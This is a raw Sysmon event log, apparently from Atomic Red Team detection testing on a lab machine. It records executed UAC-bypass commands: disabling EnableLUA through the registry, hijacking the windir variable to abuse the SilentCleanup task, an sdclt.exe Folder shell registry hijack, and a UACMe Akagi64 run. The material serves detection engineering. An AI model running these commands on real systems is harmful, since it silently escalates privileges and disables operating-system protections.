AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000671002Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:20.751{51A89197-C794-6552-FE02-000000001E00}4400C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 272 0000025DF3F06FC0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000670685Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:20.374{51A89197-C794-6552-FD02-000000001E00}6096C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 272 0000025DF3F076E0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000670461Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:19.896{51A89197-C793-6552-FC02-000000001E00}1404C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000670431Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:19.823{51A89197-C793-6552-FB02-000000001E00}2552C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000670109Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:19.497{51A89197-C793-6552-FA02-000000001E00}2884C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 272 0000025DF3F06FC0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000669787Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:18.437{51A89197-C792-6552-F902-000000001E00}1932C:\DetectionTesting\Temp\ExternalPayloads\uacme\23 Akagi64.exe3.2.7.2009UACMe main moduleUACMeHazardous EnvironmentsAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=5B3D90A0C867956DBDB90626BF20A4DAC2D97059,MD5=EDD10898AD429BFB013989061C07BEFC,SHA256=61255EFF8C10CE0FF7CA16E0658CB045E94DABB3949A7EE0BD280B03B6CE454F,IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38{51A89197-C792-6552-F702-000000001E00}2852C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000669755Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:18.380{51A89197-C792-6552-F802-000000001E00}1160C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C792-6552-F702-000000001E00}2852C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000669748Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:18.367{51A89197-C792-6552-F702-000000001E00}2852C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000669724Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:18.181{51A89197-C792-6552-F602-000000001E00}7848C:\Windows\System32\reg.exe10.0.17134.1 (WinBuild.160101.0800)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg delete "HKCU\Environment" /v "windir" /FC:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=04CE0B79EA20332CC4FF4679883B18BFE4341FBD,MD5=E3DACF0B31841FA02064B4457D44B357,SHA256=928693D84D652DC15B3FCDC6576D790053755C5181CE6708B1110DE12ADAE4A1,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000669378Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:15.514{51A89197-C78F-6552-F502-000000001E00}7800C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C78F-6552-F402-000000001E00}4692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell ATTACKBOX-WIN10\VICTIM 154100x8000000000000000669372Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:15.485{51A89197-C78F-6552-F402-000000001E00}4692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C78F-6552-F102-000000001E00}5668C:\Windows\System32\cmd.execmd /c start powershell&REM \system32\cleanmgr.exe /autoclean /d C:ATTACKBOX-WIN10\VICTIM 154100x8000000000000000669261Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:15.260{51A89197-C78F-6552-F302-000000001E00}6820C:\Windows\System32\timeout.exe10.0.17134.1 (WinBuild.160101.0800)timeout - pauses command processingMicrosoft® Windows® Operating SystemMicrosoft Corporationtimeout.exetimeout /t 3 C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=CB91BD898DC4B49B14ED7C843F61ADB4F3E38346,MD5=EB9A65078396FB5D4E3813BB9198CB18,SHA256=B7D686C4C92D1C0BBF1604B8C43684E227353293B3206A1220BAB77562504B3C,IMPHASH=0C91A5CE0FB26F4C5CE39E340F43873B{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000669260Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:15.259{51A89197-C78F-6552-F202-000000001E00}8088C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C78F-6552-F102-000000001E00}5668C:\Windows\System32\cmd.execmd /c start powershell&REM \system32\cleanmgr.exe /autoclean /d C:ATTACKBOX-WIN10\VICTIM 154100x8000000000000000669249Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:15.247{51A89197-C78F-6552-F102-000000001E00}5668C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Execmd /c start powershell&REM \system32\cleanmgr.exe /autoclean /d C:C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000669172Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:15.179{51A89197-C78F-6552-F002-000000001E00}8124C:\Windows\System32\schtasks.exe10.0.17134.1 (WinBuild.160101.0800)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationschtasks.exeschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=815A050FC4BD12C6CA0B62D38D0FB6F8A95F70A8,MD5=838D346D1D28F00783B7A6C6BD03A0DA,SHA256=8BE433049CCC271F04A8E625E9FB9BD3BCF15B4EDEB63497C00BD9CE1CD5C50E,IMPHASH=7EE4BC5589713B3470B8A950256E2E69{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000669108Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:13.257{51A89197-C78D-6552-EF02-000000001E00}3412C:\Windows\System32\timeout.exe10.0.17134.1 (WinBuild.160101.0800)timeout - pauses command processingMicrosoft® Windows® Operating SystemMicrosoft Corporationtimeout.exetimeout /t 2 C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=CB91BD898DC4B49B14ED7C843F61ADB4F3E38346,MD5=EB9A65078396FB5D4E3813BB9198CB18,SHA256=B7D686C4C92D1C0BBF1604B8C43684E227353293B3206A1220BAB77562504B3C,IMPHASH=0C91A5CE0FB26F4C5CE39E340F43873B{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000669093Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:13.237{51A89197-C78D-6552-EE02-000000001E00}2756C:\Windows\System32\reg.exe10.0.17134.1 (WinBuild.160101.0800)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Environment" /v "windir" /d "cmd /c start powershell&REM " C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=04CE0B79EA20332CC4FF4679883B18BFE4341FBD,MD5=E3DACF0B31841FA02064B4457D44B357,SHA256=928693D84D652DC15B3FCDC6576D790053755C5181CE6708B1110DE12ADAE4A1,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000668967Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:13.151{51A89197-C78D-6552-ED02-000000001E00}3564C:\Windows\System32\mode.com10.0.17134.1 (WinBuild.160101.0800)DOS Device MODE UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationMODE.COMmode 18,1C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=16D7150F57D44A09952BABE5ADD65942040164A7,MD5=1A3D2D975EB4A5AF22768F1E23C9A83C,SHA256=C3C078638B4C3BBE20EFDC3B5CE4B8471738D5AF572868A04A49C8335DB1B0B8,IMPHASH=2F60C2ED7648C832822B0B1EE9787340{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000668914Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:13.047{51A89197-C78D-6552-EC02-000000001E00}6172C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000668907Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:13.040{51A89197-C78D-6552-EB02-000000001E00}8164C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\T1548.002\src\T1548.002.bat"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000668878Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:12.867{51A89197-C78C-6552-EA02-000000001E00}6632C:\Windows\System32\reg.exe10.0.17134.1 (WinBuild.160101.0800)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fC:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=04CE0B79EA20332CC4FF4679883B18BFE4341FBD,MD5=E3DACF0B31841FA02064B4457D44B357,SHA256=928693D84D652DC15B3FCDC6576D790053755C5181CE6708B1110DE12ADAE4A1,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC{51A89197-C78C-6552-E802-000000001E00}4252C:\Windows\System32\cmd.exe"cmd.exe" /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fATTACKBOX-WIN10\VICTIM 154100x8000000000000000668846Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:12.814{51A89197-C78C-6552-E902-000000001E00}7616C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C78C-6552-E802-000000001E00}4252C:\Windows\System32\cmd.exe"cmd.exe" /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fATTACKBOX-WIN10\VICTIM 154100x8000000000000000668839Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:12.803{51A89197-C78C-6552-E802-000000001E00}4252C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fC:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000668663Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:11.154{51A89197-C78B-6552-E702-000000001E00}6280C:\Windows\System32\notepad.exe10.0.17134.1 (WinBuild.160101.0800)NotepadMicrosoft® Windows® Operating SystemMicrosoft CorporationNOTEPAD.EXEnotepad.exeC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=867B54F1BC5B71045A9A00BACA485A24176B202C,MD5=BB9A06B8F2DD9D24C77F389D7B2B58D2,SHA256=899346F9F283A4FD5AA03015A3F58CDE5B9C0B6A5C4D64C2CC74E9B22C1348D7,IMPHASH=A8F8224EB74E94301B59B88492740A75{51A89197-C78A-6552-E502-000000001E00}6624C:\Windows\System32\cmd.exe"cmd.exe" /c notepad.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000668275Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:10.792{51A89197-C78A-6552-E602-000000001E00}7012C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C78A-6552-E502-000000001E00}6624C:\Windows\System32\cmd.exe"cmd.exe" /c notepad.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000668232Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:10.746{51A89197-C78A-6552-E502-000000001E00}6624C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c notepad.exeC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C789-6552-E302-000000001E00}1292C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" /name Microsoft.BackupAndRestoreCenterATTACKBOX-WIN10\VICTIM 154100x8000000000000000667260Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:09.650{51A89197-C789-6552-E402-000000001E00}6832C:\Windows\SysWOW64\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=131793BFA295C9AF787DB15CDFFCB8AEE659F01C,MD5=70E2034A1C3D0ECCB73F57E33D4BFFA0,SHA256=92CB5C8AB93952A7A5755276CDAB2F052AC9AE32964EAC2371CC056AC7B34E9B,IMPHASH=FB1328DBA53A95E7775F51164B2E5AEB{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000667197Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:09.586{51A89197-C789-6552-E302-000000001E00}1292C:\Windows\System32\control.exe10.0.17134.1 (WinBuild.160101.0800)Windows Control PanelMicrosoft® Windows® Operating SystemMicrosoft CorporationCONTROL.EXE"C:\Windows\System32\control.exe" /name Microsoft.BackupAndRestoreCenterC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=813D8A7B64F4C2290AA102137192E099DDF17404,MD5=625DAC87CB5D7D44C5CA1DA57898065F,SHA256=E91DA8CBA88D81737B982B29E2EAEB5FFA614E7256D8FB308633290702DD7D86,IMPHASH=7A8EC2645C24D85DE8216D63022623C0{51A89197-C789-6552-E202-000000001E00}344C:\Windows\System32\sdclt.exe"C:\Windows\system32\sdclt.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000667018Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:09.408{51A89197-C789-6552-E202-000000001E00}344C:\Windows\System32\sdclt.exe10.0.17134.1 (WinBuild.160101.0800)Microsoft® Windows BackupMicrosoft® Windows® Operating SystemMicrosoft Corporationsdclt.exe"C:\Windows\system32\sdclt.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=81075ADC86FCD253E84E5E9745881DA503512F0E,MD5=0632A8402C6504CD541AC93676AAD0F5,SHA256=5C5F48B079FBCAA5DFB3ED0CD3352154AC4869DA98FDCC44601C076F47503A84,IMPHASH=651E4CF2B45257EE0CBBFBAFB8BF4454{51A89197-C788-6552-DE02-000000001E00}7180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {New-Item -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Value 'cmd.exe /c notepad.exe' New-ItemProperty -Force -Path \""HKCU:\Software\Classes\Folder\shell\open\command\"" -Name \""DelegateExecute\"" Start-Process -FilePath $env:windir\system32\sdclt.exe Start-Sleep -s 3}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000666730Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:04:09.250{51A89197-C789-6552-E102-000000001E00}2888C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 300 0000025DF3FBDD20C:\Windows\system32\NT 